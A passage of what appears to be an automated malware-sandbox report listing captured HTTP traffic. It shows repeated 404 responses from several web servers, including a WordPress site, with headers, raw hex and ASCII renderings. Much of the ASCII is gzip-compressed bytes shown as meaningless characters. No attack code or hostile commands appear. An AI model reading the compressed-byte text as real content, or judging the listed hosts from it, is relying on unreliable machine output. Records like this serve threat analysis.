181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 13:59:01 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d c2 c9 37 4a 42 a3 eb 4d 67 17 a4 61 d0 52 d4 02 59 a3 41 69 68 19 0c c2 86 5c f9 b1 6c 36 f4 e0 de 72 13 ea a6 b2 5f ea f7 39 7f 07 4c e8 1e 7e 54 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 13:59:04 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d c2 c9 37 4a 42 a3 eb 4d 67 17 a4 61 d0 52 d4 02 59 a3 41 69 68 19 0c c2 86 5c f9 b1 6c 36 f4 e0 de 72 13 ea a6 b2 5f ea f7 39 7f 07 4c e8 1e 7e 54 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 596Connection: closeDate: Wed, 03 Jul 2024 13:59:06 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 21 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 52 52 4f 52 20 34 30 34 3a 20 41 52 43 48 49 56 4f 20 4e 4f 20 45 4e 43 4f 4e 54 52 41 44 4f 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 68 61 20 73 69 64 6f 20 65 6e 63 6f 6e 74 72 61 64 6f 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404! </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> ERROR 404: ARCHIVO NO ENCONTRADO </h1> <p style="font-size:0.8em;"> El documento solicitado no ha sido encontrado. </p> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 13:59:25 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 16449Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 b9 91 2d fa bb b4 96 df 01 c5 5a 6e 91 dd 04 bf 29 a9 92 a2 ec fe f4 f8 5c b7 db d3 d5 9e b9 e7 76 f7 aa 83 4c 04 33 51 42 02 69 00 49 8a 45 eb 61 ce ba 6f 71 ff ce 8b dd 40 26 bf 99 94 28 95 c6 9e 33 ac 12 09 04 22 76 ec d8 b1 af 5f 7f f3 c3 d7 3f fd cf bf 7c 4b 12 97 ca 9b b3 6b ff 43 24 53 f1 b8 96 39 fa d5 8f 35 1f 03 c6 6f ce 5e 5d a7 e0 18 89 12 66 2c b8 71 ed af 3f 7d 47 af 6a a4 bd 7e 51 2c 85 71 6d 2a 60 96 69 e3 6a 24 d2 ca 81 c2 cc 99 e0 2e 19 73 98 8a 08 68 71 69 12 a1 84 13 4c 52 1b 31 09 e3 6e 81 b3 05 73 6e 74 a8 9d 3d 5f 83 9c a7 ec 8e 8a 94 c5 40 33 03 be 49 20 99 89 e1 bc 28 74 c2 49 b8 f9 cb 7f fc ef 58 28 44 f8 8f ff 57 13 50 be d4 30 ce c8 67 6f ae 7a dd ee 88 7c 0f 39 b1 c2 c1 75 bb cc 3f bb 96 42 dd 12 03 72 7c ce 95 f5 c0 13 70 51 72 4e 12 3c 8d cf db ed 29 28 ce ac 62 33 08 bb ad 48 a7 65 b7 75 55 8d 49 07 46 31 07 35 e2 e6 19 4e cf b2 4c 8a 88 39 a1 55 db 58 fb c5 5d 2a f1 c9 77 1b d7 be 03 e0 24 63 86 ad 89 90 cf 0c fb 5b ae 47 b5 b2 61 2d 71 2e b3 c1 61 db f6 04 4b db b5 4f 6e ce 01 f5 4c 51 ce ff f8 df 46 68 fb 4c 32 f8 e7 31 ec 36 2b 1b 19 91 b9 9b b3 99 50 5c cf 5a ef 67 19 a4 fa 83 78 07 ce 09 15 5b 32 26 8b 5a c8 2c fc d5 c8 5a b0 84 fe a5 fd 4b db b6 66 2d 6d e2 5f da c5 6a ed 2f 08 6e e0 97 76 51 fc 4b bb 3b 6c 75 5a fd 5f da 97 bd bb cb de 2f ed 5a b3 06 77 0e eb 5b 99 8a f1 62 a7 f1 f3 f0 b0 b0 40 c3 df 6f 4b 40 3c f9 bb ce 4d 04 b5 60 51 43 ef a0 90 45 d9 12 bf 80 df d7 e2 97 f6 2c a3 42 45 32 e7 be d9 07 5b 04 8a 32 8a 3b 02 9c b8 95 0a d5 fa 60 7f 37 05 33 be 68 0d 5b c3 da fd fd e8 ac fd f9 6b f2 53 22 2c 99 08 09 04 7f 59 ee 34 8d 41 81 c1 b6 9c 7c de 3e 7b 3d c9 55 e4 77 59 17 4d d5 58 4c 99 21 ba 69 9b 30 5a c5 49 54 87 c6 c2 99 79 f1 e6 c6 0b 9b 67 99 36 ee 27 b0 ce 06 d0 74 22 c5 13 4b b3 a0 ae 60 46 be 41 e0 46 6b ca 64 0e 3f 4c ea 8d fb 91 05 6b 11 e6 9d d3 06 b5 6a 59 70 7f c4 89 eb ba f9 3f de fd f0 e7 96 75 06 37 27 26 f3 ba 6b 34 ee 51 8c 28 f1 ed ee ef d7 ed b3 3a f6 f0 d4 a0 15 e1 a8 e6 47 88 5c bd d3 ec 34 f1 ce d4 94 e1 2e 04 77 c9 e6 9a 80 88 13 d7 c0 00 4e 2d 7f c2 5d d6 1d a6 77 1a a3 72 00 cf f2 af 42 b9 7e ef 4b 63 d8 bc 0e ad 18 39 f9 45 22 77 76 0a 74 8b 63 62 a3 69 c6 f5 4f e0 a4 0a 4e cd 97 62 d3 18 19 70 b9 51 c4 b5 00 4d 30 af af f7 8a f2 35 16 cb 47 Data Ascii: v#-Zn)\vL3QBiIEaoq@&(3"v_?|KkC$S95o^]f,q?}Gj~Q,qm*`ij$.shqiLR1nsnt=_@3
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 13:59:28 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 16449Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 b9 91 2d fa bb b4 96 df 01 c5 5a 6e 91 dd 04 bf 29 a9 92 a2 ec fe f4 f8 5c b7 db d3 d5 9e b9 e7 76 f7 aa 83 4c 04 33 51 42 02 69 00 49 8a 45 eb 61 ce ba 6f 71 ff ce 8b dd 40 26 bf 99 94 28 95 c6 9e 33 ac 12 09 04 22 76 ec d8 b1 af 5f 7f f3 c3 d7 3f fd cf bf 7c 4b 12 97 ca 9b b3 6b ff 43 24 53 f1 b8 96 39 fa d5 8f 35 1f 03 c6 6f ce 5e 5d a7 e0 18 89 12 66 2c b8 71 ed af 3f 7d 47 af 6a a4 bd 7e 51 2c 85 71 6d 2a 60 96 69 e3 6a 24 d2 ca 81 c2 cc 99 e0 2e 19 73 98 8a 08 68 71 69 12 a1 84 13 4c 52 1b 31 09 e3 6e 81 b3 05 73 6e 74 a8 9d 3d 5f 83 9c a7 ec 8e 8a 94 c5 40 33 03 be 49 20 99 89 e1 bc 28 74 c2 49 b8 f9 cb 7f fc ef 58 28 44 f8 8f ff 57 13 50 be d4 30 ce c8 67 6f ae 7a dd ee 88 7c 0f 39 b1 c2 c1 75 bb cc 3f bb 96 42 dd 12 03 72 7c ce 95 f5 c0 13 70 51 72 4e 12 3c 8d cf db ed 29 28 ce ac 62 33 08 bb ad 48 a7 65 b7 75 55 8d 49 07 46 31 07 35 e2 e6 19 4e cf b2 4c 8a 88 39 a1 55 db 58 fb c5 5d 2a f1 c9 77 1b d7 be 03 e0 24 63 86 ad 89 90 cf 0c fb 5b ae 47 b5 b2 61 2d 71 2e b3 c1 61 db f6 04 4b db b5 4f 6e ce 01 f5 4c 51 ce ff f8 df 46 68 fb 4c 32 f8 e7 31 ec 36 2b 1b 19 91 b9 9b b3 99 50 5c cf 5a ef 67 19 a4 fa 83 78 07 ce 09 15 5b 32 26 8b 5a c8 2c fc d5 c8 5a b0 84 fe a5 fd 4b db b6 66 2d 6d e2 5f da c5 6a ed 2f 08 6e e0 97 76 51 fc 4b bb 3b 6c 75 5a fd 5f da 97 bd bb cb de 2f ed 5a b3 06 77 0e eb 5b 99 8a f1 62 a7 f1 f3 f0 b0 b0 40 c3 df 6f 4b 40 3c f9 bb ce 4d 04 b5 60 51 43 ef a0 90 45 d9 12 bf 80 df d7 e2 97 f6 2c a3 42 45 32 e7 be d9 07 5b 04 8a 32 8a 3b 02 9c b8 95 0a d5 fa 60 7f 37 05 33 be 68 0d 5b c3 da fd fd e8 ac fd f9 6b f2 53 22 2c 99 08 09 04 7f 59 ee 34 8d 41 81 c1 b6 9c 7c de 3e 7b 3d c9 55 e4 77 59 17 4d d5 58 4c 99 21 ba 69 9b 30 5a c5 49 54 87 c6 c2 99 79 f1 e6 c6 0b 9b 67 99 36 ee 27 b0 ce 06 d0 74 22 c5 13 4b b3 a0 ae 60 46 be 41 e0 46 6b ca 64 0e 3f 4c ea 8d fb 91 05 6b 11 e6 9d d3 06 b5 6a 59 70 7f c4 89 eb ba f9 3f de fd f0 e7 96 75 06 37 27 26 f3 ba 6b 34 ee 51 8c 28 f1 ed ee ef d7 ed b3 3a f6 f0 d4 a0 15 e1 a8 e6 47 88 5c bd d3 ec 34 f1 ce d4 94 e1 2e 04 77 c9 e6 9a 80 88 13 d7 c0 00 4e 2d 7f c2 5d d6 1d a6 77 1a a3 72 00 cf f2 af 42 b9 7e ef 4b 63 d8 bc 0e ad 18 39 f9 45 22 77 76 0a 74 8b 63 62 a3 69 c6 f5 4f e0 a4 0a 4e cd 97 62 d3 18 19 70 b9 51 c4 b5 00 4d 30 af af f7 8a f2 35 16 cb 47 Data Ascii: v#-Zn)\vL3QBiIEaoq@&(3"v_?|KkC$S95o^]f,q?}Gj~Q,qm*`ij$.shqiLR1nsnt=_@3
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 13:59:31 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 16449Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 b9 91 2d fa bb b4 96 df 01 c5 5a 6e 91 dd 04 bf 29 a9 92 a2 ec fe f4 f8 5c b7 db d3 d5 9e b9 e7 76 f7 aa 83 4c 04 33 51 42 02 69 00 49 8a 45 eb 61 ce ba 6f 71 ff ce 8b dd 40 26 bf 99 94 28 95 c6 9e 33 ac 12 09 04 22 76 ec d8 b1 af 5f 7f f3 c3 d7 3f fd cf bf 7c 4b 12 97 ca 9b b3 6b ff 43 24 53 f1 b8 96 39 fa d5 8f 35 1f 03 c6 6f ce 5e 5d a7 e0 18 89 12 66 2c b8 71 ed af 3f 7d 47 af 6a a4 bd 7e 51 2c 85 71 6d 2a 60 96 69 e3 6a 24 d2 ca 81 c2 cc 99 e0 2e 19 73 98 8a 08 68 71 69 12 a1 84 13 4c 52 1b 31 09 e3 6e 81 b3 05 73 6e 74 a8 9d 3d 5f 83 9c a7 ec 8e 8a 94 c5 40 33 03 be 49 20 99 89 e1 bc 28 74 c2 49 b8 f9 cb 7f fc ef 58 28 44 f8 8f ff 57 13 50 be d4 30 ce c8 67 6f ae 7a dd ee 88 7c 0f 39 b1 c2 c1 75 bb cc 3f bb 96 42 dd 12 03 72 7c ce 95 f5 c0 13 70 51 72 4e 12 3c 8d cf db ed 29 28 ce ac 62 33 08 bb ad 48 a7 65 b7 75 55 8d 49 07 46 31 07 35 e2 e6 19 4e cf b2 4c 8a 88 39 a1 55 db 58 fb c5 5d 2a f1 c9 77 1b d7 be 03 e0 24 63 86 ad 89 90 cf 0c fb 5b ae 47 b5 b2 61 2d 71 2e b3 c1 61 db f6 04 4b db b5 4f 6e ce 01 f5 4c 51 ce ff f8 df 46 68 fb 4c 32 f8 e7 31 ec 36 2b 1b 19 91 b9 9b b3 99 50 5c cf 5a ef 67 19 a4 fa 83 78 07 ce 09 15 5b 32 26 8b 5a c8 2c fc d5 c8 5a b0 84 fe a5 fd 4b db b6 66 2d 6d e2 5f da c5 6a ed 2f 08 6e e0 97 76 51 fc 4b bb 3b 6c 75 5a fd 5f da 97 bd bb cb de 2f ed 5a b3 06 77 0e eb 5b 99 8a f1 62 a7 f1 f3 f0 b0 b0 40 c3 df 6f 4b 40 3c f9 bb ce 4d 04 b5 60 51 43 ef a0 90 45 d9 12 bf 80 df d7 e2 97 f6 2c a3 42 45 32 e7 be d9 07 5b 04 8a 32 8a 3b 02 9c b8 95 0a d5 fa 60 7f 37 05 33 be 68 0d 5b c3 da fd fd e8 ac fd f9 6b f2 53 22 2c 99 08 09 04 7f 59 ee 34 8d 41 81 c1 b6 9c 7c de 3e 7b 3d c9 55 e4 77 59 17 4d d5 58 4c 99 21 ba 69 9b 30 5a c5 49 54 87 c6 c2 99 79 f1 e6 c6 0b 9b 67 99 36 ee 27 b0 ce 06 d0 74 22 c5 13 4b b3 a0 ae 60 46 be 41 e0 46 6b ca 64 0e 3f 4c ea 8d fb 91 05 6b 11 e6 9d d3 06 b5 6a 59 70 7f c4 89 eb ba f9 3f de fd f0 e7 96 75 06 37 27 26 f3 ba 6b 34 ee 51 8c 28 f1 ed ee ef d7 ed b3 3a f6 f0 d4 a0 15 e1 a8 e6 47 88 5c bd d3 ec 34 f1 ce d4 94 e1 2e 04 77 c9 e6 9a 80 88 13 d7 c0 00 4e 2d 7f c2 5d d6 1d a6 77 1a a3 72 00 cf f2 af 42 b9 7e ef 4b 63 d8 bc 0e ad 18 39 f9 45 22 77 76 0a 74 8b 63 62 a3 69 c6 f5 4f e0 a4 0a 4e cd 97 62 d3 18 19 70 b9 51 c4 b5 00 4d 30 af af f7 8a f2 35 16 cb 47 Data Ascii: v#-Zn)\vL3QBiIEaoq@&(3"v_?|KkC$S95o^]f,q?}Gj~Q,qm*`ij$.shqiLR1nsnt=_@3
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 03 Jul 2024 13:59:44 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 03 Jul 2024 13:59:47 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 